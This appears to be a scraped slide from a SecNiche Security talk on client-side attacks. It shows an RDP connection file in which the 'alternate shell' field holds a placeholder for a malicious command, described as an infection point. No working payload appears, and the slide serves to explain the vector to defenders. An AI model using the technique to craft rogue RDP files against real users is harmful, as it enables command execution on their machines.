Hacking Client Side Insecurities Attack Point - RDP Microsoft Terminal Services RDP has inbuilt option of executing command through shell directly which is a possible attack point of Infection. screen mode id:i:1 desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 winposstr:s:0,3,0,0,800,572 full address:s:www.intlogistics.com alternate shell:s: Malicious or rogue Command compression:i:1 keyboardhook:i:2 audiomode:i:0 redirectdrives:i:0 redirectprinters:i:1 redirectcomports:i:0 redirectsmartcards:i:1 displayconnectionbar:i:1 autoreconnection enabled:i:1 username:s:freight .

Microsoft Terminal Services RDP has inbuilt option of executing command through shell directly which is a possible attack point of Infection.

screen mode id:i:1

desktopwidth:i:800

desktopheight:i:600

session bpp:i:16

winposstr:s:0,3,0,0,800,572

full address:s:www.intlogistics.com

alternate shell:s: Malicious or rogue Command

compression:i:1

keyboardhook:i:2

audiomode:i:0

redirectdrives:i:0

redirectprinters:i:1

redirectcomports:i:0

redirectsmartcards:i:1

displayconnectionbar:i:1

autoreconnection enabled:i:1

username:s:freight

.

Hacking Client Side Insecurities Demonstrations!

Hacking Client Side Insecurities Questions

Hacking Client Side Insecurities Thanks and Regards

Hacking Client Side Insecurities SecNiche Security http://www.secniche.org

#option presentations

Add a comment

Related presentations

Related pages

Client Side Hacks - OWASP

Client-side threats can be devastating to any organization. These attacks include browser-specific vulnerabilities, different kinds of cross ...
Read more

gaming - How are client side hacks created? - Information ...

How are client side hacks created? [closed] ... Hacking the client. So far we were only using external means and didn't touch the client.
Read more

hacking 802.11 protocol insecurities - SecNiche Security Labs

hacking 802.11 protocol insecurities ... The client is unable ... On the other side, if the frame size is de-
Read more

Client Side vs Server Side Application Security Hacking by ...

Client Side application security and Server Side application security each present unique and enjoyable challenges for hackers. In this video, I ...
Read more

Ethical Hacking - Client-side attack - InfoSec Institute ...

This is an example of a client-side attack using a compromised web-server (curson animation exploit) whose homepage has an iframe that has been ...
Read more

Minecraft Hacked Clients - 2/32 - WiZARDHAX.com

Tag Archives: Minecraft Hacked Clients. Minecraft ACE 1.8 – 1.8.9 Hacked Client (with OptiFine) ... Minecraft 1.8.x SkyWars Hacking with Wurst 1.8 ...
Read more

Minecraft Hacked Clients - WiZARDHAX.com

Tag Archives: Minecraft Hacked Clients. Minecraft AJModsMCPE Minecraft Pocket Edition Hacked Client for Android – Minecraft PE Android Hacks + DOWNLOAD!
Read more